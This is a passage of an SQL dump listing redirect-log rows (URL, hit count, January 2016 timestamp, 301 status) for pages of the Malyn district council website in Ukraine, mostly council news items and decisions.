00:00:00',301),(24926,'http://malyn-rayrada.org.ua/index.php/387-zaversheno-pidgotovku-do-provedennja-chergovoi_3?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:23:34','0000-00-00 00:00:00',301),(24927,'http://malyn-rayrada.org.ua/index.php/388-vidbulas-16-sesija-rajonnoi-radi-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:23:41','0000-00-00 00:00:00',301),(24928,'http://malyn-rayrada.org.ua/index.php/401-predstavleno-kerivnika-kp-malinska-rajonna','','','',3,0,'2016-01-11 09:23:44','0000-00-00 00:00:00',301),(24929,'http://malyn-rayrada.org.ua/index.php/401-predstavleno-kerivnika-kp-malinska-rajonna?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:23:45','0000-00-00 00:00:00',301),(24930,'http://malyn-rayrada.org.ua/index.php/422-rezultati-viboriv-v-skuratah','','','',5,0,'2016-01-11 09:23:48','0000-00-00 00:00:00',301),(24931,'http://malyn-rayrada.org.ua/index.php/422-rezultati-viboriv-v-skuratah?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:23:50','0000-00-00 00:00:00',301),(24932,'http://malyn-rayrada.org.ua/index.php/439-do-vidoma-sub-ektiv-pidpriemnickoi-dijalnosti','','','',8,0,'2016-01-11 09:23:51','0000-00-00 00:00:00',301),(24933,'http://malyn-rayrada.org.ua/index.php/439-do-vidoma-sub-ektiv-pidpriemnickoi-dijalnosti?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:23:53','0000-00-00 00:00:00',301),(24934,'http://malyn-rayrada.org.ua/index.php/456-vikonannja-dohidnoi-chastini-bjudzhetiv-za-2012','','','',3,0,'2016-01-11 09:23:56','0000-00-00 00:00:00',301),(24935,'http://malyn-rayrada.org.ua/index.php/456-vikonannja-dohidnoi-chastini-bjudzhetiv-za-2012?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:23:58','0000-00-00 00:00:00',301),(24936,'http://malyn-rayrada.org.ua/index.php/469-sogodni-22-sichnja-v-ukraini-vidznachaetsja-den','','','',5,0,'2016-01-11 09:23:59','0000-00-00 00:00:00',301),(24937,'http://malyn-rayrada.org.ua/index.php/469-sogodni-22-sichnja-v-ukraini-vidznachaetsja-den?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:24:01','0000-00-00 00:00:00',301),(24938,'http://malyn-rayrada.org.ua/index.php/470-pro-vidznachennja-derzhavnimi-nagorodami-ukraini-z','','','',5,0,'2016-01-11 09:24:03','0000-00-00 00:00:00',301),(24939,'http://malyn-rayrada.org.ua/index.php/470-pro-vidznachennja-derzhavnimi-nagorodami-ukraini-z?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:24:05','0000-00-00 00:00:00',301),(24940,'http://malyn-rayrada.org.ua/index.php/477-priznachennja-tizhnja_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:24:10','0000-00-00 00:00:00',301),(24941,'http://malyn-rayrada.org.ua/index.php/479-porjadok-dennij-18-sesii-rajonnoi-radi-6?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:24:16','0000-00-00 00:00:00',301),(24942,'http://malyn-rayrada.org.ua/index.php/483-zaversheno-pidgotovku-do-17-sesii-malinskoi','','','',3,0,'2016-01-11 09:24:23','0000-00-00 00:00:00',301),(24943,'http://malyn-rayrada.org.ua/index.php/56-ogoloshennja-shhodo-provedennja-kruglogo-stolu','','','',3,0,'2016-01-11 09:24:35','0000-00-00 00:00:00',301),(24944,'http://malyn-rayrada.org.ua/index.php/56-ogoloshennja-shhodo-provedennja-kruglogo-stolu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:24:38','0000-00-00 00:00:00',301),(24945,'http://malyn-rayrada.org.ua/index.php/83-deputati-radilis-shhodo-situacii-v-kp-trs-polissja?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:26:14','0000-00-00 00:00:00',301),(24946,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/700-pro-vnesennja-zmin-do-kompleksnoi-dovgostrokovoi_3','','','',3,0,'2016-01-11 09:27:08','0000-00-00 00:00:00',301),(24947,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/702-pro-suspilno-politichnu-situaciju-v-ukraini?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:27:20','0000-00-00 00:00:00',301),(24948,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/260-pro-spisannja-osnovnih-zasobiv_2','','','',4,0,'2016-01-11 09:31:50','0000-00-00 00:00:00',301),(24949,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=317:-l-2008-2012-r&lang=uk&option=com_content&view=article','','','',3,0,'2016-01-11 12:22:59','0000-00-00 00:00:00',301),(24950,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43&lan__7bf__g=en&lang=en&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-01-11 12:23:01','0000-00-00 00:00:00',301),(24951,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=59&Itemid=107&lang=ru&limitstart=5','','','',4,0,'2016-01-11 12:33:50','0000-00-00 00:00:00',301),(24952,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=786:-5-18112009-429-l-r&Itemid=84&lang=en&option=com_content&view=article','','','',3,0,'2016-01-11 14:52:53','0000-00-00 00:00:00',301),(24953,'http://malyn-rayrada.org.ua/index.php?catid=15&id=860:09&lang=ru&option=com_content&view=article','','','',3,0,'2016-01-11 17:43:03','0000-00-00 00:00:00',301),(24954,'http://malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=926:2013-02-21-09-02-30&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-11 19:22:16','0000-00-00 00:00:00',301),(24955,'http://malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=544:2012-01-26-12-03-44&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-11 19:22:17','0000-00-00 00:00:00',301),(24956,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo?page=1','','','',9,0,'2016-01-11 19:30:24','0000-00-00 00:00:00',301),(24957,'http://malyn-rayrada.org.ua/attachments/124_reiting 6 mis 2011.PDF','','','',1,0,'2016-01-11 19:40:55','0000-00-00 00:00:00',301),(24958,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=49:--12042013-&layout=blog&Itemid=88&lang=uk&limitstart=5','','','',2,0,'2016-01-12 00:06:42','0000-00-00 00:00:00',301),(24959,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=39:-22022012-&layout=blog&Itemid=76&lang=uk&limitstart=10','','','',1,0,'2016-01-12 04:19:43','0000-00-00 00:00:00',301),(24960,'http://malyn-rayrada.org.ua/index.php?Itemid&catid=15&id=864:-qq&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-12 06:22:00','0000-00-00 00:00:00',301),(24961,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?catid=36:2011-07-21-07-51-53&id=article:&lang=en','','','',5,0,'2016-01-12 08:30:52','0000-00-00 00:00:00',301),(24962,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=41&Itemid=79&lang=en','','','',1,0,'2016-01-12 09:13:42','0000-00-00 00:00:00',301),(24963,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=479:2011-11-28-07-33-14&catid=38:--19122011-&Itemid=73&lang=uk','','','',1,0,'2016-01-12 11:38:03','0000-00-00 00:00:00',301),(24964,'http://malyn-rayrada.org.ua/index.php?catid=0&id=390','','','',1,0,'2016-01-12 11:50:47','0000-00-00 00:00:00',301),(24965,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/134-pro-vnesennja-zmin-do-reglamentu-roboti-rajonnoi_2','','','',4,0,'2016-01-12 12:03:03','0000-00-00 00:00:00',301),(24966,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/175-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_5','','','',5,0,'2016-01-12 13:05:39','0000-00-00 00:00:00',301),(24967,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=580:-l-r-2012-2016-&catid=40:--28032012-&Itemid=77&lang=en','','','',2,0,'2016-01-12 13:10:38','0000-00-00 00:00:00',301),(24968,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=619:-11-6-&catid=11&lang=uk&Itemid=','','','',3,0,'2016-01-12 13:38:06','0000-00-00 00:00:00',301),(24969,'http://malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=596:2012-02-28-12-59-05&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-12 14:10:54','0000-00-00 00:00:00',301),(24970,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo','','','',10,0,'2016-01-12 16:40:41','0000-00-00 00:00:00',301),(24971,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=54&layout=blog&Itemid=95&lang=uk','','','',4,0,'2016-01-12 19:00:03','0000-00-00 00:00:00',301),(24972,'http://malyn-rayrada.org.ua/index.php/86-14-zhovtnja-den-ukrainskogo-kozactva','','','',8,0,'2016-01-12 19:37:43','0000-00-00 00:00:00',301),(24973,'http://malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=802:-i-i-i-i-i&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-12 22:21:53','0000-00-00 00:00:00',301),(24974,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=808:2012-10-30-13-56-37&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-13 01:13:36','0000-00-00 00:00:00',301),(24975,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/786-1-16-kubku-zhitomirskoi-oblasti?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-13 02:47:10','0000-00-00 00:00:00',301),(24976,'http://www.malyn-rayrada.org.ua/index.php/593-ogoloshennja_8?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-13 02:48:29','0000-00-00 00:00:00',301),(24977,'http://www.malyn-rayrada.org.ua/index.php/641-pitannja-rozrahunkiv-rozporjadnikiv-koshtiv?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-13 02:48:59','0000-00-00 00:00:00',301),(24978,'http://www.malyn-rayrada.org.ua/index.php/644-dodatkovu-dotaciju-z-derzhavnogo-bjudzhetu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-13 02:49:03','0000-00-00 00:00:00',301),(24979,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/766-pro-pogodzhennja-priznachennja-na-posadu-direktora_4?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-13 03:44:26','0000-00-00 00:00:00',301),(24980,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=565:2012-02-03-09-48-29&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-13 03:49:03','0000-00-00 00:00:00',301),(24981,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=194:-----------2008-2010-&lang=ru&option=com_content&view=article','','','',3,0,'2016-01-13 13:16:36','0000-00-00 00:00:00',301),(24982,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=436:------l-r--2007-2011-&catid=37&Itemid=72&lang=en','','','',7,0,'2016-01-13 17:51:40','0000-00-00 00:00:00',301),(24983,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1270:2014-04-08-13-49-40&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-13 18:31:29','0000-00-00 00:00:00',301),(24984,'http://malyn-rayrada.org.ua/index.php/218-informacija-pro-dijalnist-likarnjanoi-kasi-u?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-13 19:38:36','0000-00-00 00:00:00',301),(24985,'http://malyn-rayrada.org.ua/index.php/244-ekzotiki-za-rahunok-bjudzhetu-ne-bude?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-01-13 19:38:38','0000-00-00 00:00:00',301),(24986,'http://malyn-rayrada.org.ua/index.php/37-shho-minfin-vdilit-rajonu-v-2012-roci','','','',9,0,'2016-01-13 19:39:27','0000-00-00 00:00:00',301),(24987,'http://malyn-rayrada.org.ua/index.php/37-shho-minfin-vdilit-rajonu-v-2012-roci?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-01-13 19:39:29','0000-00-00 00:00:00',301),(24988,'http://malyn-rayrada.org.ua/index.php/391-pershi-oficijni-rezultati-viboriv_2?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-01-13 19:39:37','0000-00-00 00:00:00',301),(24989,'http://malyn-rayrada.org.ua/index.php/86-14-zhovtnja-den-ukrainskogo-kozactva?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-01-13 19:41:30','0000-00-00 00:00:00',301),(24990,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/698-pro-rozmishhennja-timchasovo-vilnih-koshtiv?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-13 19:42:25','0000-00-00 00:00:00',301),(24991,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/450-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo_4?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-01-13 19:42:43','0000-00-00 00:00:00',301),(24992,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/361-pro-prisvoennja-golovi-rajonnoi-radi-chergovogo?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-01-13 19:43:18','0000-00-00 00:00:00',301),(24993,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/827-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_','','','',1,0,'2016-01-13 19:46:20','0000-00-00 00:00:00',301),(24994,'http://www.malyn-rayrada.org.ua/index.php/632-zavershilas-pidgotovka-do-provedennja-24-sesii?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-13 23:42:30','0000-00-00 00:00:00',301),(24995,'http://www.malyn-rayrada.org.ua/index.php/633-informacija-shhodo-vnesennja-zmin-v-bjudzhet-2013?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-13 23:42:32','0000-00-00 00:00:00',301),(24996,'http://www.malyn-rayrada.org.ua/index.php/649-pro-ogoloshennja-podjaki?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-13 23:42:41','0000-00-00 00:00:00',301),(24997,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=36&layout=blog&Itemid=70&lang=ru&limitstart=10','','','',1,0,'2016-01-14 02:46:10','0000-00-00 00:00:00',301),(24998,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=208:2010-12-15-14-26-03&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-14 03:48:09','0000-00-00 00:00:00',301),(24999,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=36:2011-07-21-07-51-53&layout=blog&Itemid=70&lang=uk&limitstart=5','','','',1,0,'2016-01-14 04:04:34','0000-00-00 00:00:00',301),(25000,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=36:2011-07-21-07-51-53&layout=blog&Itemid=70&lang=ru&limitstart=5','','','',3,0,'2016-01-14 04:05:46','0000-00-00 00:00:00',301),(25001,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=36:2011-07-21-07-51-53&layout=blog&Itemid=70&lang=uk&limitstart=15','','','',1,0,'2016-01-14 05:09:03','0000-00-00 00:00:00',301),(25002,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=36:2011-07-21-07-51-53&layout=blog&Itemid=70&lang=uk&limitstart=10','','','',1,0,'2016-01-14 05:17:31','0000-00-00 00:00:00',301),(25003,'http://www.malyn-rayrada.org.ua/index.php?Itemid=61&catid=30:--30122010-&id=228:-2011-&lang=ru&option=com_content&view=article','','','',3,0,'2016-01-14 06:37:31','0000-00-00 00:00:00',301),(25004,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=421:2011-09-30-14-14-22&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-14 06:37:32','0000-00-00 00:00:00',301),(25005,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=883:-2012-&catid=11&Itemid=14&lang=en','','','',3,0,'2016-01-14 07:03:38','0000-00-00 00:00:00',301),(25006,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=20:-2009-&catid=16&Itemid=39&lang=uk','','','',4,0,'2016-01-14 08:59:53','0000-00-00 00:00:00',301),(25007,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=620:2012-03-29-10-03-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2016-01-14 09:04:30','0000-00-00 00:00:00',301),(25008,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42&id=676:2012-05-17-09-52-12&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-14 10:59:00','0000-00-00 00:00:00',301),(25009,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=786:-5-18112009-429-l-r&catid=45&Itemid=84&lang=uk','','','',11,0,'2016-01-14 12:27:26','0000-00-00 00:00:00',301),(25010,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=uk&limitstart=15','','','',4,0,'2016-01-14 14:35:13','0000-00-00 00:00:00',301),(25011,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1023-pro-zatverdzhennya-zvitu-pro-otsinka-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',2,0,'2016-01-14 15:40:55','0000-00-00 00:00:00',301),(25012,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=464:2011-11-11-12-15-19&catid=38:--19122011-&Itemid=73&lang=ru','','','',1,0,'2016-01-14 16:02:55','0000-00-00 00:00:00',301),(25013,'http://malyn-rayrada.org.ua/index.php/592-vitaemo-iz-svjatom-pershogo-dzvonika_2','','','',3,0,'2016-01-14 16:29:23','0000-00-00 00:00:00',301),(25014,'http://malyn-rayrada.org.ua/index.php/593-ogoloshennja_8','','','',3,0,'2016-01-14 16:29:24','0000-00-00 00:00:00',301),(25015,'http://malyn-rayrada.org.ua/index.php/603-ogoloshennja-akcija-miloserdja?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-14 16:29:26','0000-00-00 00:00:00',301),(25016,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/698-pro-rozmishhennja-timchasovo-vilnih-koshtiv','','','',2,0,'2016-01-14 16:30:40','0000-00-00 00:00:00',301),(25017,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/370-pro-zatverdzhennja-spisku-prisjazhnih-malinskogo','','','',2,0,'2016-01-14 16:31:46','0000-00-00 00:00:00',301),(25018,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/378-pro-vstanovlennja-mezh-silskih-naselenih-punktiv','','','',2,0,'2016-01-14 16:31:58','0000-00-00 00:00:00',301),(25019,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/392-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_15','','','',2,0,'2016-01-14 16:32:07','0000-00-00 00:00:00',301),(25020,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/115-pro-ugodu-mizh-rajonnoju-ta-silskimi-selishhnimi','','','',3,0,'2016-01-14 16:33:04','0000-00-00 00:00:00',301),(25021,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/296-pro-vnesennja-zmin-do-programi-socialno','','','',3,0,'2016-01-14 16:33:06','0000-00-00 00:00:00',301),(25022,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/223-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_8','','','',3,0,'2016-01-14 16:33:07','0000-00-00 00:00:00',301),(25023,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/604-pro-nadannja-dozvolu-na-vigotovlennja-proektu','','','',3,0,'2016-01-14 16:34:01','0000-00-00 00:00:00',301),(25024,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=40&layout=blog&Itemid=77&lang=ru&limitstart=5','','','',4,0,'2016-01-14 20:41:40','0000-00-00 00:00:00',301),(25025,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=77&lang=ru&limitstart=5','','','',2,0,'2016-01-14 20:45:30','0000-00-00 00:00:00',301),(25026,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=77&lang=ru&limitstart=5','','','',1,0,'2016-01-14 21:07:27','0000-00-00 00:00:00',301),(25027,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=40:--28032012-&layout=blog&Itemid=77&lang=ru&limitstart=5','','','',1,0,'2016-01-14 21:20:11','0000-00-00 00:00:00',301),(25028,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/130713-8-128','','','',1,0,'2016-01-14 22:15:59','0000-00-00 00:00:00',301),(25029,'http://www.malyn-rayrada.org.ua/index.php/244-ekzotiki-za-rahunok-bjudzhetu-ne-bude?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2016-01-15 00:31:24','0000-00-00 00:00:00',301),(25030,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=31:2010-06-09-11-52-38&catid=11&Itemid=16&lang=en','','','',2,0,'2016-01-15 02:17:53','0000-00-00 00:00:00',301),(25031,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=583:-l-lr&catid=40&Itemid=77&lang=uk','','','',1,0,'2016-01-15 04:58:53','0000-00-00 00:00:00',301),(25032,'http://malyn-rayrada.org.ua/index.php/591-shanovni-pidpriemci?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 06:16:09','0000-00-00 00:00:00',301),(25033,'http://malyn-rayrada.org.ua/index.php/593-ogoloshennja_8?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 06:16:11','0000-00-00 00:00:00',301),(25034,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/393-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_8?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-15 06:16:58','0000-00-00 00:00:00',301),(25035,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/110-pro-zatverdzhennja-novogo-skladu-komisii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-15 06:17:00','0000-00-00 00:00:00',301),(25036,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/299-pro-nadannja-dozvolu-teritorialnomu-centru_2?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-15 06:17:36','0000-00-00 00:00:00',301),(25037,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/490-pro-pogodzhennja-perejmenuvannja-naselenogo-punktu?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-15 06:17:50','0000-00-00 00:00:00',301),(25038,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/237-pro-vstup-malinskoi-rajonnoi-radi-do-vseukrainskoi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-15 06:17:52','0000-00-00 00:00:00',301),(25039,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/73-pro-obrannja-golovi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-15 06:17:55','0000-00-00 00:00:00',301),(25040,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=562:--------19122011194---30122011202&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2016-01-15 07:12:46','0000-00-00 00:00:00',301),(25041,'http://www.malyn-rayrada.org.ua/index.php/187-ogoloshennja?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-15 09:29:09','0000-00-00 00:00:00',301),(25042,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/den-samovriaduv2013-011-133','','','',2,0,'2016-01-15 09:29:18','0000-00-00 00:00:00',301),(25043,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/ds3-134','','','',2,0,'2016-01-15 09:29:20','0000-00-00 00:00:00',301),(25044,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0802-2-95','','','',2,0,'2016-01-15 09:29:22','0000-00-00 00:00:00',301),(25045,'http://www.malyn-rayrada.org.ua/index.php/407-vorsivska-silska-gromada-znovu-na-zv-jazku?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:29:31','0000-00-00 00:00:00',301),(25046,'http://www.malyn-rayrada.org.ua/index.php/56-ogoloshennja-shhodo-provedennja-kruglogo-stolu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-15 09:29:56','0000-00-00 00:00:00',301),(25047,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1164-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-15 09:39:28','0000-00-00 00:00:00',301),(25048,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1165-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-15 09:39:30','0000-00-00 00:00:00',301),(25049,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1166-pro-khid-vikonannya-rajonnoji-programi-sotsialnoji-pidtrimki-vnutrishno-peremishchenikh-osib-z-timchasovo-okupovanoji-teritoriji?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-15 09:39:32','0000-00-00 00:00:00',301),(25050,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/702-pro-suspilno-politichnu-situaciju-v-ukraini?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-15 09:39:41','0000-00-00 00:00:00',301),(25051,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/449-pro-aktualizaciju-shemi-planuvannja-malinskogo?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-01-15 09:39:44','0000-00-00 00:00:00',301),(25052,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/450-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo_4?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-15 09:39:46','0000-00-00 00:00:00',301),(25053,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/503-pro-viznachennja-statusu-komunalnogo-zakladu?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-15 09:39:54','0000-00-00 00:00:00',301),(25054,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/504-pro-pogodzhennja-statusu-malinskoi-ditjachoi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-15 09:39:56','0000-00-00 00:00:00',301),(25055,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/359-pro-hid-vikonannja-rajonnoi-programi-provedennja-u?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:40:04','0000-00-00 00:00:00',301),(25056,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/361-pro-prisvoennja-golovi-rajonnoi-radi-chergovogo?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-15 09:40:06','0000-00-00 00:00:00',301),(25057,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/106-pro-hid-vikonannja-rajonnoi-programi-realizacii_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:40:48','0000-00-00 00:00:00',301),(25058,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/112-pro-hid-vikonannja-rajonnoi-programi_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:40:50','0000-00-00 00:00:00',301),(25059,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/160-pro-stan-rozrahunkiv-za-majnovi-ta-zemelni-pai?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 09:40:54','0000-00-00 00:00:00',301),(25060,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/167-pro-viplatu-odnorazovoi-groshovoi-dopomogi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-15 